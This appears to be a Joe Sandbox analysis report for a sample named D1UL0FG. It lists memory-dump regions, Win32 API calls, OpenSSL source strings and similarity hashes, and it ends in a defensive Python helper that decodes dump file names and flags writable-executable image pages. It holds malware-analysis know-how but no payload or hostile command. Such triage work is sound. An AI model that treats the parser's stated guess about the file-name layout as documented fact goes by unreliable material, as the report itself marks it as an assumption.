• Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: 64d992c46ee3b7395fe78fb810fe312dfe396e54660f00f57cdb80144ae96788
• Instruction ID: b3dafb40df55a1660027b11f7531067e0e2004e04927585f42f1707e75534f3b
• Opcode Fuzzy Hash: 64d992c46ee3b7395fe78fb810fe312dfe396e54660f00f57cdb80144ae96788
• Instruction Fuzzy Hash: E721A423F3D24682FA547765665113D63425F487B0F4087B8D87EC76FADE2DB800A300
APIs
• GetLastError.KERNEL32(?,?,?,00007FF67AEE4F81,?,?,?,?,00007FF67AEEA4FA,?,?,?,?,00007FF67AEE71FF), ref: 00007FF67AEEB347
• FlsSetValue.KERNEL32(?,?,?,00007FF67AEE4F81,?,?,?,?,00007FF67AEEA4FA,?,?,?,?,00007FF67AEE71FF), ref: 00007FF67AEEB37D
• FlsSetValue.KERNEL32(?,?,?,00007FF67AEE4F81,?,?,?,?,00007FF67AEEA4FA,?,?,?,?,00007FF67AEE71FF), ref: 00007FF67AEEB3AA
• FlsSetValue.KERNEL32(?,?,?,00007FF67AEE4F81,?,?,?,?,00007FF67AEEA4FA,?,?,?,?,00007FF67AEE71FF), ref: 00007FF67AEEB3BB
• FlsSetValue.KERNEL32(?,?,?,00007FF67AEE4F81,?,?,?,?,00007FF67AEEA4FA,?,?,?,?,00007FF67AEE71FF), ref: 00007FF67AEEB3CC
• SetLastError.KERNEL32(?,?,?,00007FF67AEE4F81,?,?,?,?,00007FF67AEEA4FA,?,?,?,?,00007FF67AEE71FF), ref: 00007FF67AEEB3E7
Memory Dump Source
• Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: 508bc4e8de0e80a19cd6daf9ed8871fa40715e6eab000f8b832e18dd1cfec2a0
• Instruction ID: 3ea4bef323f937b941fbc38cf24f40855ece8a63cd2bf493774a51f5250fe4b0
• Opcode Fuzzy Hash: 508bc4e8de0e80a19cd6daf9ed8871fa40715e6eab000f8b832e18dd1cfec2a0
• Instruction Fuzzy Hash: 2B116023A3C68686FA547721A69213D63429F547B0F5487B4E87EC77F6EF7CA801A301
APIs
Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3007572245.00007FF8A92E1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FF8A92E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007520980.00007FF8A92E0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9354000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9379000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9384000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A938E000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007939655.00007FF8A9391000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007986367.00007FF8A9393000.00000004.00000001.01000000.00000017.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff8a92e0000_D1UL0FG.jbxd
Similarity
• API ID: 00007C6113440ErrorLast
• String ID: %s/%s$..\s\ssl\ssl_cert.c$OPENSSL_DIR_read(&ctx, '
• API String ID: 181156767-4291904164
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
• String ID: Unhandled exception in script
• API String ID: 3081866767-2699770090
APIs
• GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF67AED918F,?,00007FF67AED3C55), ref: 00007FF67AED2BA0
• MessageBoxW.USER32 ref: 00007FF67AED2C2A
Strings
Memory Dump Source
• Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: CurrentMessageProcess
• String ID: WARNING$Warning$[PYI-%d:%ls]
• API String ID: 1672936522-3797743490
APIs
Memory Dump Source
• Source File: 00000006.00000002.3010460517.00007FF8B9101000.00000040.00000001.01000000.00000015.sdmp, Offset: 00007FF8B9100000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff8b9100000_D1UL0FG.jbxd
Similarity
• API ID: Cert$Store$00007CloseContextEnumErrorFreeLastOpen
• String ID:
• API String ID: 966150261-0
APIs
Memory Dump Source
• Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
APIs
• FlsGetValue.KERNEL32(?,?,?,00007FF67AEEA613,?,?,00000000,00007FF67AEEA8AE,?,?,?,?,?,00007FF67AEEA83A), ref: 00007FF67AEEB41F
• FlsSetValue.KERNEL32(?,?,?,00007FF67AEEA613,?,?,00000000,00007FF67AEEA8AE,?,?,?,?,?,00007FF67AEEA83A), ref: 00007FF67AEEB43E
• FlsSetValue.KERNEL32(?,?,?,00007FF67AEEA613,?,?,00000000,00007FF67AEEA8AE,?,?,?,?,?,00007FF67AEEA83A), ref: 00007FF67AEEB466
• FlsSetValue.KERNEL32(?,?,?,00007FF67AEEA613,?,?,00000000,00007FF67AEEA8AE,?,?,?,?,?,00007FF67AEEA83A), ref: 00007FF67AEEB477
• FlsSetValue.KERNEL32(?,?,?,00007FF67AEEA613,?,?,00000000,00007FF67AEEA8AE,?,?,?,?,?,00007FF67AEEA83A), ref: 00007FF67AEEB488
Memory Dump Source
• Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.3007572245.00007FF8A92E1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FF8A92E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007520980.00007FF8A92E0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9354000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9379000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9384000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A938E000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007939655.00007FF8A9391000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007986367.00007FF8A9393000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8a92e0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C61208
                                                                                                                                                                                                                                          • String ID: &$..\s\ssl\statem\statem_clnt.c$resumption
                                                                                                                                                                                                                                          • API String ID: 3535234312-1441847574
                                                                                                                                                                                                                                          • Opcode ID: a2a1fe7ef8bbf980694a84b1801f65fd6b1e6e9000ff944b82d81e57b58df6bb
                                                                                                                                                                                                                                          • Instruction ID: 71da4d4a50296c2bc98efed0c59985ac748500e1dacac33ff74a48458ccc273c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2a1fe7ef8bbf980694a84b1801f65fd6b1e6e9000ff944b82d81e57b58df6bb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50F19832A0EAC195EB208F1AE4853A9BBB5FB94BC4F049135DA8D87795DF7DE580C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3007572245.00007FF8A92E1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FF8A92E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007520980.00007FF8A92E0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9354000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9379000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9384000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A938E000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007939655.00007FF8A9391000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007986367.00007FF8A9393000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8a92e0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C61208
                                                                                                                                                                                                                                          • String ID: $..\s\ssl\ssl_sess.c$T
                                                                                                                                                                                                                                          • API String ID: 3535234312-2024727245
                                                                                                                                                                                                                                          • Opcode ID: bae10787738cc56e37b62d3b1ee36bf99efdbc286f7b95d1d095db50d282c8fb
                                                                                                                                                                                                                                          • Instruction ID: 6eafb82b2fa5beacf5ab01b5025083faaebd1b4145ae6de713f54de044b4afc7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bae10787738cc56e37b62d3b1ee36bf99efdbc286f7b95d1d095db50d282c8fb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03C19B32A0EAC2A2EB659F26D8547F927A1EB84BC4F145035DE1D8B7A5EF3CE541C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                          • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                          • Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                          • Instruction ID: db7d6e1f5c1a643dc1519314539446ccaa9f6f0f31b074e72d4fdf170bbecf2e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05819D33E2C24285F7646F2981503793BA0AB11B58FE580B5DA0DD72BADF2DF901E701
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3002205748.00007FF8A8631000.00000040.00000001.01000000.0000001A.sdmp, Offset: 00007FF8A8630000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002160686.00007FF8A8630000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002205748.00007FF8A8694000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002205748.00007FF8A86E3000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002205748.00007FF8A873C000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002205748.00007FF8A8741000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002205748.00007FF8A8744000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002828639.00007FF8A8745000.00000080.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002876682.00007FF8A8747000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8a8630000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C6126570
                                                                                                                                                                                                                                          • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                                                                                                                                                                                                          • API String ID: 800424832-87138338
                                                                                                                                                                                                                                          • Opcode ID: c8e681eb15480172cfe4a28a3257cda92461c1a9f1febbdb02df2df24e1a544b
                                                                                                                                                                                                                                          • Instruction ID: e26d115abbbd81b7980b6ce1885f9e03e3487c0964a51a2c6e8296169f755039
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8e681eb15480172cfe4a28a3257cda92461c1a9f1febbdb02df2df24e1a544b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40614932B1A20266F6608A19E5087BA7392FF80BD1F446235E96D477C9DF3CE409C714
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4170891091-0
• Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
• Instruction ID: 10c56d16edc8ce774b309087459a0f5709734dadeac67502bc7988c8abfcf43d
• Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
• Instruction Fuzzy Hash: B1510473F2C2158AFB24EF6499616BC37A1AB40358F914279DE1ED2AF5DF38A4029700
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo
• String ID: ?
• API String ID: 1286766494-1684325040
• Opcode ID: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
• Instruction ID: 07ca307dfe24972e1085f23b7e02e2018b70b1bf25b10b42bbcecd75f8bde3c8
• Opcode Fuzzy Hash: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
• Instruction Fuzzy Hash: DA412813A2C78242FBA4AB25F40137A6790EBA0BA4F144279EE5D87AF5DF3DD541DB00
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.3007572245.00007FF8A92E1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FF8A92E0000, based on PE: true
• Associated: 00000006.00000002.3007520980.00007FF8A92E0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007572245.00007FF8A9354000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007572245.00007FF8A9379000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007572245.00007FF8A9384000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007572245.00007FF8A938E000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007939655.00007FF8A9391000.00000080.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007986367.00007FF8A9393000.00000004.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff8a92e0000_D1UL0FG.jbxd
Similarity
• API ID: 00007B911
• String ID: ..\s\ssl\statem\extensions_clnt.c
• API String ID: 2143881289-592572767
• Opcode ID: 2277d602e12e024388a9d4cef9287e1d4121b4c948b8fb80c28345a1f791c9cc
• Instruction ID: c5b1fac7c1b057711348db01dbf16ce5177fbad6db66578eb1f653be333b1ddb
• Opcode Fuzzy Hash: 2277d602e12e024388a9d4cef9287e1d4121b4c948b8fb80c28345a1f791c9cc
• Instruction Fuzzy Hash: EA419D7270EAC196EB608F15E5402AD67B4FB44BC4F685032DB4C87BA9EF7DD5A18700
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
• Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
• Instruction ID: 36159fc43ec5a3f4997be3bbefe2bca9038f51860b30d1743edf442ec718850a
• Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
• Instruction Fuzzy Hash: 8241C373B28A8585EB609F65E4443BA6760FB88794F404035EE4DC7BA8EF3DD451DB40
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.3007572245.00007FF8A92E1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FF8A92E0000, based on PE: true
• Associated: 00000006.00000002.3007520980.00007FF8A92E0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007572245.00007FF8A9354000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007572245.00007FF8A9379000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007572245.00007FF8A9384000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007572245.00007FF8A938E000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007939655.00007FF8A9391000.00000080.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007986367.00007FF8A9393000.00000004.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff8a92e0000_D1UL0FG.jbxd
Similarity
• API ID: Time$System$File
• String ID: gfff
• API String ID: 2838179519-1553575800
• Opcode ID: 5bab4889fdff038a34dd7d6efd02d934e11c3433e8613633f5b88581a3d60216
• Instruction ID: 0d0638d31299d4ac5681b764cb2292416960e42a5d496324ec31ac030e45157b
• Opcode Fuzzy Hash: 5bab4889fdff038a34dd7d6efd02d934e11c3433e8613633f5b88581a3d60216
• Instruction Fuzzy Hash: F721C172A1968796EF948F2DE484379BAE0EB88BD8F449035DA6DC7758EE3CD0408700
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.3007572245.00007FF8A92E1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FF8A92E0000, based on PE: true
• Associated: 00000006.00000002.3007520980.00007FF8A92E0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007572245.00007FF8A9354000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007572245.00007FF8A9379000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007572245.00007FF8A9384000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007572245.00007FF8A938E000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007939655.00007FF8A9391000.00000080.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007986367.00007FF8A9393000.00000004.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff8a92e0000_D1UL0FG.jbxd
Similarity
• API ID: 00007B911
• String ID: ..\s\ssl\statem\extensions_srvr.c$3
• API String ID: 2143881289-3555168737
• Opcode ID: 6667dba7c5238e8d1662bf7e78e192f7ee7ee4d5288dc2d1f2b8f39ccf0876d4
• Instruction ID: 1b469547e59312e13cbec6e6cc6bb73bebf5a9749b6bb2ecddcb0896b05eae26
• Opcode Fuzzy Hash: 6667dba7c5238e8d1662bf7e78e192f7ee7ee4d5288dc2d1f2b8f39ccf0876d4
• Instruction Fuzzy Hash: 6321AB3270EA8196E7508F10E8803AC63A4E749BC4F585131DA4C8BB99DE7DD690C700
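Two modules recur in the Memory Dump Source lines of the entries above: the image based at 0x7FF67AED0000 (module index 0A, whose API IDs are CRT and Win32 names such as _get_daylight and ErrorFileLastWrite) and the image based at 0x7FF8A92E0000 (module index 17, whose String IDs are OpenSSL source-tree paths such as ..\s\ssl\statem\extensions_clnt.c). The .sdmp file names also carry the page protection and region type of every dumped range, which is what tells an analyst whether a module's code pages were still in their on-disk state or had been made writable. The Python below is an added example, not Joe Sandbox code: it parses the dump names exactly as they appear in this listing (with the "Download File" link text that extraction glued onto them), decodes the protection and type fields with the documented winnt.h constants, and flags executable-and-writable pages inside an image mapping. The field layout pid.run.dumpid.address.protect.flags.type.moduleindex is an assumption inferred from the names on this page; the sample input is constructed from the entries above.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Windows page-protection and region-type constants from winnt.h (documented
# values, not assumptions). Modifier bits such as PAGE_GUARD are masked off.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# ASSUMED layout of a Joe Sandbox .sdmp name, inferred from the names in this
# report: pid.run.dumpid.baseaddr.protect.flags.type.moduleindex.sdmp, with
# address, protection and type in hex and the first three fields decimal.
SDMP_RE = re.compile(
    r"(?P<pid>\d{8})\.(?P<run>\d{8})\.(?P<dump>\d+)\.(?P<addr>[0-9A-F]{16})\."
    r"(?P<prot>[0-9A-F]{8})\.(?P<flags>[0-9A-F]{8})\.(?P<type>[0-9A-F]{8})\."
    r"(?P<module>[0-9A-F]{8})\.sdmp"
)


@dataclass(frozen=True)
class Region:
    pid: int
    addr: int
    protect: int
    mem_type: int
    module: str

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, hex(self.protect))

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, hex(self.mem_type))

    @property
    def writable_code(self) -> bool:
        # W+X pages inside an image mapping: either the PE declares writable
        # code sections or the protection was changed after load. Either way
        # the range is a candidate for code that was unpacked or patched in memory.
        return self.mem_type == 0x1000000 and (self.protect & 0xFF) in (0x40, 0x80)


def parse_sdmp(name: str):
    """Decode one .sdmp file name; returns None if it does not fit the assumed layout."""
    m = SDMP_RE.search(name.strip())
    if not m:
        return None
    return Region(int(m["pid"]), int(m["addr"], 16), int(m["prot"], 16),
                  int(m["type"], 16), m["module"])


def parse_listing(text: str):
    """Pull every Source File / Associated dump name out of report text.
    'Download File' is link text glued onto the names by extraction; drop it."""
    regions = []
    for line in text.splitlines():
        line = line.strip().lstrip("• ").replace("Download File", "")
        if line.startswith(("Source File:", "Associated:")):
            name = line.split(":", 1)[1].split(",", 1)[0].strip()
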